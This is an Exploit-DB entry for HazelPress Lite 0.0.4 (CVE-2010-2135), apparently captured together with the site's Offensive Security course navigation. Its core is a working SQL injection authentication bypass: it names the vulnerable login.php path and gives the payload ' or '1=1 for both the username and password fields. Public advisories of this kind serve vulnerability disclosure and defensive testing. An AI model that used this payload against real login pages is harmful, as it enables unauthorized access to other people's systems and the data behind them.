HazelPress Lite 0.0.4 - Authentication Bypass

EDB-ID:

11602

CVE:

2010-2135

EDB Verified:

Author:

cr4wl3r

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2010-02-28

Vulnerable App: 
# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1
Tags:
Advisory/Source: Link
Downloads Certifications Training Professional Services
Kali Linux OSCP Penetration Testing with Kali Linux (PWK) (PEN-200)
All new for 2020 		Penetration Testing
Kali NetHunter OSWP Offensive Security Wireless Attacks (WiFu) (PEN-210) Advanced Attack Simulation
Kali Linux Revealed Book OSEP Evasion Techniques and Breaching Defences (PEN-300)
All new for 2020 		Application Security Assessment
OSWE Advanced Web Attacks and Exploitation (AWAE) (WEB-300)
Updated for 2020
OSED Windows User Mode Exploit Development (EXP-301)
All new for 2021
OSEE
KLCP [Free] Kali Linux Revealed
Kali Linux Kali NetHunter Kali Linux Revealed Book
OSCP OSWP OSEP OSWE OSED OSEE KLCP
- Penetration Testing with Kali Linux (PWK) (PEN-200)
All new for 2020 Offensive Security Wireless Attacks (WiFu) (PEN-210) Evasion Techniques and Breaching Defences (PEN-300)
All new for 2020 Advanced Web Attacks and Exploitation (AWAE) (WEB-300)
Updated for 2020 Windows User Mode Exploit Development (EXP-301)
All new for 2021 [Free] Kali Linux Revealed
Penetration Testing Advanced Attack Simulation Application Security Assessment